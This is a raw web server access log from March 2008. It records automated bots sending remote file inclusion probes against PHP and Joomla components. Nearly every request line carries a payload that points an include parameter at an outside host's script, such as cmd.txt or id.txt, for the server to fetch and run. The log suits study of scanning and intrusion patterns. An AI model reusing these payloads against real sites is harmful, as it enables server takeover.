200.47.82.13 - - [25/Mar/2008:09:11:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:11:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:11:33 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.164.242.195 - - [25/Mar/2008:09:11:55 -0700] "GET /logs/access_071229.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:09:12:04 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:12:25 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:12:30 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:12:31 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:12:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:12:35 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:12:36 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:12:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:12:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:12:40 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:13:01 -0700] "GET /logs/access_080207.log//Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:13:01 -0700] "GET /logs/access_080225.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:13:01 -0700] "GET //Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:13:01 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:13:27 -0700] "GET /logs/access_080119.log//Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:13:43 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:14:27 -0700] "GET /logs/access_080306.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:14:33 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.47.82.13 - - [25/Mar/2008:09:14:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:09:15:20 -0700] "GET /logs/access_080215.log//login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:09:15:24 -0700] "GET /logs//login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:15:40 -0700] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:15:40 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:15:40 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:16:02 -0700] "GET /logs/access_080225.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:16:11 -0700] "GET /logs/access_080225.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:16:27 -0700] "GET /convert/mvcw.php?vwar_root=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:16:33 -0700] "GET /logs/access_080219.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:09:17:17 -0700] "GET /index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:09:17:44 -0700] "GET /logs//intern/admin/other/backup.php?admin=1&rootdir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:09:17:44 -0700] "GET //intern/admin/other/backup.php?admin=1&rootdir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:18:03 -0700] "GET /logs/access_080126.log//login.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:18:03 -0700] "GET //login.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:18:03 -0700] "GET /logs//login.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:18:08 -0700] "GET /logs/access.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:18:09 -0700] "GET /logs/access_080215.log/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:18:09 -0700] "GET /logs/access_080215.log/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:18:10 -0700] "GET /index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:18:10 -0700] "GET /index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:18:10 -0700] "GET /logs/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:09:18:10 -0700] "GET /logs/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:09:19:04 -0700] "GET /logs/access_080312.log//?pag=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:09:19:04 -0700] "GET /logs//?pag=http://netbr.org/documents/cmd.txt? HTTP/1.0" 200 40252 "-" "libwww-perl/5.53" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:19:10 -0700] "GET /logs/access_080215.log/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:19:10 -0700] "GET /index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:19:11 -0700] "GET /logs/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:09:19:47 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:20:46 -0700] "GET /logs/access_080225.log//admin.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:20:46 -0700] "GET /logs/access_080225.log//index2.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:21:01 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:21:01 -0700] "GET /convert/mvcw.php?vwar_root=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:21:01 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:21:10 -0700] "GET /logs/access_080225.log//config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:21:33 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:21:33 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:09:21:36 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.216.120.163 - - [25/Mar/2008:09:21:49 -0700] "GET /page.php?doc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:09:22:05 -0700] "GET /index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:22:28 -0700] "GET /logs/access_080119.log//?pag=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.37.130 - - [25/Mar/2008:09:22:37 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.37.130 - - [25/Mar/2008:09:22:37 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.37.130 - - [25/Mar/2008:09:22:37 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:09:22:38 -0700] "GET /logs/access_080225.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:09:22:39 -0700] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.173 - - [25/Mar/2008:09:22:41 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.173 - - [25/Mar/2008:09:22:41 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.173 - - [25/Mar/2008:09:22:41 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:09:22:47 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:09:22:49 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.166.152.66 - - [25/Mar/2008:09:22:49 -0700] "GET /logs/access_071229.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.126.237.102 - - [25/Mar/2008:09:22:54 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.126.237.102 - - [25/Mar/2008:09:22:54 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.126.237.102 - - [25/Mar/2008:09:22:54 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:23:09 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:23:10 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:23:15 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:23:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.189.9.54 - - [25/Mar/2008:09:23:15 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.9.54 - - [25/Mar/2008:09:23:16 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.9.54 - - [25/Mar/2008:09:23:16 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:23:31 -0700] "GET /logs/access_080225.log//index.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.63.128.87 - - [25/Mar/2008:09:23:41 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
212.204.230.31 - - [25/Mar/2008:09:23:41 -0700] "GET /logs/access_080126.log//login.php?dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.63.128.87 - - [25/Mar/2008:09:23:42 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
212.204.230.31 - - [25/Mar/2008:09:23:42 -0700] "GET /logs//login.php?dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.63.128.87 - - [25/Mar/2008:09:23:42 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
209.97.198.42 - - [25/Mar/2008:09:23:43 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.198.42 - - [25/Mar/2008:09:23:43 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.198.42 - - [25/Mar/2008:09:23:43 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.12.244.192 - - [25/Mar/2008:09:23:45 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [25/Mar/2008:09:23:45 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [25/Mar/2008:09:23:45 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.254.30 - - [25/Mar/2008:09:23:46 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.254.30 - - [25/Mar/2008:09:23:46 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.254.30 - - [25/Mar/2008:09:23:47 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.61.101 - - [25/Mar/2008:09:23:47 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.61.101 - - [25/Mar/2008:09:23:47 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.61.101 - - [25/Mar/2008:09:23:48 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.160.86 - - [25/Mar/2008:09:23:50 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.160.86 - - [25/Mar/2008:09:23:50 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.160.86 - - [25/Mar/2008:09:23:51 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.96.199.124 - - [25/Mar/2008:09:24:05 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.96.199.124 - - [25/Mar/2008:09:24:06 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.96.199.124 - - [25/Mar/2008:09:24:06 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:24:18 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:24:18 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:24:19 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.11.35 - - [25/Mar/2008:09:24:24 -0700] "GET /logs/access_071227.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.11.35 - - [25/Mar/2008:09:24:27 -0700] "GET //index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.11.35 - - [25/Mar/2008:09:24:27 -0700] "GET /logs//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.204.230.31 - - [25/Mar/2008:09:24:39 -0700] "GET /logs/access_080131.log//login.php?dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:09:25:03 -0700] "GET /logs/access_080103.log/index1.php?site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.37.130 - - [25/Mar/2008:09:25:36 -0700] "GET /logs/access.log//index.php?option=com_admin&task=view&Itemid=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
